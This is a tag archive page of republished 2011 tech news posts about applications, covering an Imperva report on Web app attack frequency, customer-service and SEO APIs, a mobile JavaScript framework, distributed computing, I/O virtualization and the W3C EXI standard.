Posts tagged applications
Report: Web Applications Attacked Every 2 Minutes
Jul 26th
Data security company Imperva released research today that says Web applications are probed or attacked 27 times an hour, or once every two minutes. At the peak of attacks, some Web applications see probes or attacks 25,000 times an hour, or seven times per second. The research gives concrete numbers to what security researchers, governments and enterprises have known for a while – their networks are persistently under attack.
When researchers look for malware and attack vectors, the tendency is to look for vulnerabilities in portals or code. Yet, most of the major data breaches in recent news have been the result of attacks on Web apps like email and data systems. The goal for hackers is to break applications with automated attacks searching for vulnerabilities until the apps crack and spill data straight into the hands of the hackers.
Sponsor
Imperva saw three distinct trends in observing Web app attacks from Dec. 2010 to May 2011: the attacks use four distinct strategies, they are automated and they originate in the United States.
Imperva says that 61% of attacks originate from botnets in the U.S. Yet, that does not mean that those doing the actual attacks are located in the U.S. When botnet controllers are looking to hit a specific target, they want to use computers closest to their bounty. The important thing about the attacks coming from the U.S. is that a lot of American’s computers are infected with malware, thus part of some botnet. For instance, if hackers want to attack the U.S. government, the command-and-control center of the botnet might activate the 1,000 computers closest to Washington, D.C. About 10% of attacks originated from China, with Sweden and France also large contributors. China makes sense for its raw number of hackers while Sweden has some of the most universal and robust broadband in the world.
The large number of attacks stems from botnet automation. Imperva said that it sees patterns where applications will be attacked with heavy bursts of many thousands of attacks per hour followed by lighter periods of activity. In essence the criminal hackers are looking to break the application quickly by testing a lot of known vulnerabilities. If it doesn’t crack, their eyes turn elsewhere (criminal hackers are notorious for looking for easy targets). They automate the attacks before coming back for another look.
While Imperva was not specifically monitoring the Lulz Security attacks at their peak in June, they noted that they were very similar to what its research had turned up. A “hack” is an esoteric term. As far as the general public knows, the attacks were some complicated computer stuff that led to data being stolen. Yet, security researchers see four common types of attacks, what Imperva calls “the unfab four”: directory traversal, cross-Site Scripting, SQL injection and remote file inclusion (RFI). These attacks come in two waves: scan and exploit. An attacker may use directory traversal and cross-site ccripting during a scan phase and then hit it with an SQL injection or an RFI in the exploit phase.
Overall, Imperva’s findings are a great illumination of Advanced Persistent Threat (APT). The company recommends that agencies and corporations become familiar with how to stop deter automated attacks and perform their own “scans” to detect known vulnerabilities. If companies are on top of knowing their security weaknesses and communicate with the security community, APT attacks can be withstood and ultimately turned against the criminals perpetrating them.
View full post on ReadWriteWeb
A New API for Bringing Cloud-based SEO Tools into Other Applications: Web CEO … – PR Web (press release)
Jun 21st
|
A New API for Bringing Cloud-based SEO Tools into Other Applications: Web CEO …
PR Web (press release) Web CEO, a leader in SEO desktop software, has just announced new features in Web CEO Online (http://www.webceo.com/), its web-based SEO solution. These include an updated logic and design of the application interface, the opening of an API and … |
View full post on SEO – Google News
New API Aims to Unite Customer Service Applications
Jun 7th
Atlassian, New Relic, OTRS, Pivotal Labs, Service Now, SugarCRM, and Zendesk have agreed to support a common JSON API specification for customer service applications called NetworkedHelpDesk.org.
The idea is to make it possible for all applications related to a customer’s experience to talk to each other, from help desk to bug tracking to project management. “Where things start to fall through the cracks is when customer service has to cross organization boundaries,” says Zendesk COO Zack Urlocker. “Either within the organization, like customer service to engineering, or outside of the organization like to a component vendor.”
Sponsor
When a customer service representative has to reach outside his own team to get an issue resolved, things can start getting messy. If someone from outside the customer service department takes over an issue, how do they track whether it’s resolved or not? Do they record customer interactions in a way that customer service can access later if the customer calls again?
These are the sort of issues that can end up driving both customers and reps bonkers, and NetworkedHelpDesk.org is designed to make things easier. The organization was founded by Atlassian, New Relic, OTRS, Pivotal Tracker, Service Now, SugarCRM, and Zendesk. Fifteen other companies have endorsed the standard, including: Coherence Design, Connect2Field, CustomWare, Freshbooks, GroundWork, PagerDuty, Pervasive, Rypple, Twilio, and Wildbit.
The first integration based on the new standard will be between Atlassian’s bug tracker JIRA and Zendesk.
The new API also allows applications to share information between instances of the same application at different companies. To kick things off, Zendesk is enabling its users to share tickets across companies.
One of the biggest challenges in this area is procedural, not technological. Getting people from outside the customer service department to add notes to a ticket, mark an issue as resolved or otherwise participate in the customer service department’s process is easier said than done. But making it easier for employees in other departments to participate in that process is certainly a step in the right direction. If someone from engineering or sales or management can update a help desk ticket from within the applications they use every day, instead of having to go into some new application, they are more likely to actually do it.
Many of these applications, including Zendesk, already had APIs that made it relatively easy to integrate into other software. Some already have integrations baked in – Rypple, for example, already integrates with Pivotal Tracker. But it’s good to see a cross-company initiative like this that will make it easier for companies to create new integrations.
Photo by Discuss
View full post on ReadWriteWeb
Jo: A Lightwight Framework for Building Cross-Platform Mobile Applications
May 2nd
Jo is a JavaScript framework for mobile applications. It’s fully compatible with PhoneGap, which it relies on for creating native applications. It’s designed to be as lightweight as possible – its minified & gzipped JavaScript is just over 12KB with no dependencies. In addition to mobile Web apps and native apps, Jo can be used to build dashboard widgets.
Joe was built by Dave Balmer, a veteran Yahoo developer now working for HP on WebOS.
Sponsor
According to Ballmer’s JSConf presentation, the core principles of Jo are:
- Don’t try to “fix” JavaScript
- Let CSS3 do its job
- Keep the code light
He says Jo also follows many of the principles from JavaScript: The Good Parts
- Constructor nesting
- Method chaining
- Custom extend() method
- Observer patterns
- Supports either bind or this
View full post on ReadWriteWeb
3 Ways to Virtualize Applications with Distributed Computing
Apr 13th
The explosion of data driven by sensors, data mining and social media and other Web-based interactions means that more and more companies will need to find ways of dealing with massive data sets – even companies that haven’t typically been data driven before. But new business analytics applications may require more processing power than your organization has ever needed before, requiring you to find ways to handle data as efficiently as possible. Infrastructure-as-a-service providers and inexpensive data warehousing appliances with in-memory analytics will provide options for many organizations. But some may find distributed computing a better fit for their organization’s big data needs.
Scientists and academics have been taking advantage of distributed computing for years, but it’s an approach that can benefit information workers in other areas. Here are some methods of running applications in distributed environments, including some newer approaches.
Sponsor
Beowulf Clustering
Made popular by NASA in 1993, cluster computing uses commodity hardware to pool resources for virtual applications. Pooling multiple systems allows you to take advantage of parallel processing. Parallel processing puts multiple processors to work on a problem simultaneously – multiple slower processors working in parallel are generally more efficient than a single fast processor working alone. Supercomputers use multiple processors for parallel processing, but a cluster of low-end machines working in unison can become the equivalent of a large supercomputer.
Beowulf clustering is a popular architecture for cluster computing. The open source Parallel Virtual Machine (PVM) software package and Message Passing Interface (MPI) implementations, such as OpenMPI or MPICH, are common software for building these clusters.
The advantage of using this approach is that you can run an application on a large number of inexpensive pieces of hardware, including systems with completely different hardware. However, some of the newer methods we’ll discuss next may be preferable.
Server Aggregation
Although a Beowulf cluster attempts to mimic the behavior of a single machine with multiple processors, each part of the cluster still has its own operating system and software stack installed. Instead of having a virtual application that runs across several machines with each running an operating system, the server aggregation approach runs a single instance of an OS across all the servers in a cluster. Therefore, all the physical resources go to the virtual machine.
This can be a real cost saver. The cost of servers is non-linear, so it’s generally cheaper to buy several two-socket systems than a single multi-socket system. And since you’ll have multiple servers, they can be used for other purposes when you don’t need them for massive number crunching jobs.
Server aggregation is a relatively new approach to virtualization. As far as we know the only company to offer server aggregation solutions is ScaleMP. However, we expect to see this approach take off over the next few years.
Server aggregation makes sense if you want to use your own hardware. But what if you want to use a public infrastructure-as-a-service?
Virtual Cluster Appliances
A virtual appliance is typically a VM designed to do a specific function with minimal configuration. Virtual cluster appliances are VMs designed for cluster computing right of the out of the box. You can learn more about the approach here.
One of the advantages here is that these VMs can be deployed to a cloud service like Amazon EC2. Instead of hosting several physical servers running virtualization or aggregation software, you can have many virtual servers running in parallel in the cloud. You still get the advantage of massively parallel computing, but without the hassle of running physical infrastructure.
The Nimbus Project is an open source toolkit for creating virtual infrastructure for cluster computing. It was used by the STAR project build a 100 VM cluster on EC2. Another source for virtual cluster appliances is Grid Appliance, which offers both a general purpose cluster appliance and one built specifically for Apache Hadoop.
Photo by hutch
View full post on ReadWriteWeb
Virtual Networks for Virtual Applications
Mar 30th
You’ve prepared your critical applications for virtualization. You’ve tested and selected a virtualization platform. You’ve built out a fleet of virtual servers and migrated your applications to them. Your hypervisor is configured and you’re ready to start sending your uses to your spiffy new virtual environment. Wait. There’s one more step you may want to take.
Just because your servers are virtual doesn’t mean they don’t need network infrastructure. Running multiple virtual servers on the same machine can create I/O bottlenecks and reduce the efficiency of your applications. Fortunately, you can use virtual I/O technology to make sure you’re getting the most out of your network infrastructure and eliminate bottlenecks.
Sponsor
A typical hypervisor environment will require six to eight physical network cards. Each of those cards will need a network cable, and each cable will need a port on a switch. Your virtual servers are getting physical fast.
I/O virtualization provides virtual network cards that satisfy these requirements without requiring actual physical cards. The hypervisors can’t tell the difference. These virtual cards can share a single cable using a single port on a switch, cutting down on the gear required to support your servers.
You can use I/O virtualization to:
- Reduce costs, thanks to having less hardware to purchase.
- Reduce complexity, thanks to having fewer cables and a central, virtual place to manage connections.
- Reduce space requirements, again thanks to having less hardware and fewer cables.
Some I/O virtualization solutions also offer bandwidth throttling. In a physical networking environment you’re typically faced with a choice of using either a one GB connection or a 10 GB connection. If you have a server that requires three GB of bandwidth you’d need to provide a 10 GB connection. The other seven GB of capacity are wasted. Worse, if a server that typically doesn’t need more than a one GB connection suddenly needs two, you need to upgrade the whole connection.
Using virtualization, you can allocate capacity to servers however you see fit. If you have three servers requiring three GB each, you can split one 10 GB connection instead of proving three separate 10 GB connections. If one of those servers ends up needing more bandwidth, you can dynamically allocate bandwidth from another server.
Several vendors offer I/O virtualization solutions, including established companies like Brocade, Cisco, Dell, HP and IBM as well as younger companies like 3Leaf and Xsigo. Considering the benefits of virtualizing your networks, it’s worth looking into early in your migration plans.
Photo by Simon Cockell
View full post on ReadWriteWeb
New XML Standard for Super-Fast, Lightweight Applications Announced by W3C
Mar 10th
From embedded sensors to high-frequency stock trading to everyday mobile web applications, the race is on for technologists to build the most efficient systems for quickly streaming large sets of data from one device to another. Sometimes the language that data is communicated in can come with high costs in terms of efficiency. Today the web’s most venerable standards body, the Word Wide Web Consortium (W3C), announced official support for a new standardized data format for super-efficient transmission of data.
Efficient XML Interchange, or EXI, is described as a very compact representation of information in XML (extensible markup language). EXI is so efficient that the W3C says it has been found to improve up to 100-fold the performance, network efficiency and power consumption of applications that use XML, including but not limited to consumer mobile apps. It is particularly useful on devices with low memory or low bandwidth.
Sponsor
A Historic Agreement
EXI has been used in commercial contexts for more than seven years, but today’s adoption of the format as a formal standard is the culmination years of collaboration between the W3C and 23 different corporate and academic institutions from around the world, including Oracle, IBM, Adobe, Chevron, Stanford University, Boeing, Cannon, France Telecom, Intel, the Web3D Consortium and others.
It’s an amazing world where the transmission of large sets of data is costly enough relative to their creation, storage and processing (the price of those has fallen so much already) that industries have a strong incentive to work together to use standards to reduce those data transmission costs substantially.
The creation of a new data transmission standard format is an event of historic importance; it’s like a new trans-continental railroad network has been unveiled, but in this case with standard rail-widths primed to make the delivery of all kinds of goods up to 100 times faster and cheaper than ever before. Florida oranges are going to make it to Minnesota for the first time, you might say, but in this century that will be a metaphor for massive sets of real-time data jumping from device to device around the world, enabling the creation and delivery of previously unimaginable products and services made of that data.
Foundational Platforms vs. Market Fragmentation
XML is a relatively open-ended data format that supports the creation of new fields of data, or namespaces, in a standardized and predictable format. The W3C says XML standards are “omnipresent in enterprise computing and are a part of the foundation of the Web.” RSS (Really Simple Syndication) is one of many forms of XML, as is XLRB, the XML data format for business data. The standardization of these formats allows data to be shared easily across different applications and devices, without the challenges of translating data from proprietary formats.
The W3C says it’s been clear for years that in low memory or low bandwidth situations, basic XML carried too high a cost for data transmission. “Market demand led to the proliferation of application-specific approaches,” the Consortium said today, “but most were neither efficient nor general enough, and they sacrificed the interoperability that makes XML so valuable.”
To adress that fragmentation of standards, the W3C brought together a wide variety of organizations seeking advances upon XML in industries ranging from smart electrical grids to defense technology to consumer devices.
The editing of the EXI standard has been lead by John Schneier, CTO of a company called AgileDelta, which has been offering EXI-based products for seven years. “They’ve achieved over 100-fold performance improvements and expanded their data networks to high speed aircraft, automobiles, mobile devices and sensor networks,” Schneier says of technologies leveraging EXI. “At the same time, they’ve achieved dramatic cost savings by using open Web standards and off-the-shelf products in place of the custom protocols, gateways and applications previously required by these applications.”
You can learn more about EXI at the W3C’s website.
View full post on ReadWriteWeb
